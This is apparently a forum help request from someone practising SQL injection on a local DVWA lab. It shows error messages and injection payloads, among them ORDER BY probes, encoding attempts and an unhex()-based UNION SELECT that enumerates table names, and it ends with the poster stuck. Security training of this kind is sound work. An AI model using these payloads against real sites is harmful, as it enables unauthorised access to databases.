As usual, tick or quote ' is used to test for SQLi vulnerabilities in DVWA.
DVWA Low Level Security
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’‘’’ at line 1
DVWA Medium Level Security
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘'’ at line 1
Both are vulnerable to SQLi, but error message from these 2 levels are different
Low : '''''
Medium : '\''
So, I tried it with ’ ORDER BY 10 – - and the SQL query works for Low level
Unknown column ‘10’ in ‘order clause’
But the same SQL query did not work on Medium level … the query was broken, hence producing the following error.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘' ORDER BY 10 – -’ at line 1
I notice that everytime ' is used on Medium level, it will be escaped with </code>
Then, I decided to use different trick to bypass this which is %27.
27 is a single quote ' value in hex.
I decided to change ‘ in ’ ORDER BY 10 – -
' is replaced with %27 so it becomes %27 ORDER BY 10 – -
Unfortunately, this trick won’t work on Low Level (no error at all), and here is the error on Medium level.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘%27 ORDER BY 10 – -’ at line 1
Since this is GET request, so the request can be seen on address bar.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=%2527+ORDER+BY+10+--+-&Submit=Submit#
Interesting, %27 has been encoded by the browser again so it becomes %2527.
25 is a hex value for %
So this won’t work.
I’ve no idea at the moment, so I googled more and found trick to use unhex() function.
unhex(27) ORDER BY 10 – -
With this, I was able to use ORDER BY function. But this only work on Medium, not Low level
Unknown column ‘10’ in ‘order clause’
I thought the problem was solved.
But when I try to use it with different SQL syntax such as table_schema=‘dvwa’, I’m getting the same error which is expected.
unhex(27) UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema=‘dvwa’-- -
Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘'dvwa'– -’ at line 1
Since unhex() trick was worked before, I thought it was working on this too.
unhex(27) UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema=unhex(27)dvwaunhex(27)-- -
Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘dvwaunhex(27)-- -’ at line 1
Little that I know … I need to seperate the second unhex(27) function with database name which is dvwa.
Else, SQL will read it as dvwaunhex(27)-- -
I’m stuck here. How do I solve this problem?